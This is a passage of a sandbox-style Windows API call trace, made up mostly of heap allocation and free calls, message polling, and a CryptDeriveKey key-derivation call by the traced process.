dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0266.456] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d30 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.456] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0266.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0266.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0266.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0266.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0266.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51c70 [0266.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51c70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.460] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0266.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0266.461] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa870d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa873d0) returned 1 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0266.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0266.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0266.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0266.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0266.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0266.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0266.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.465] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 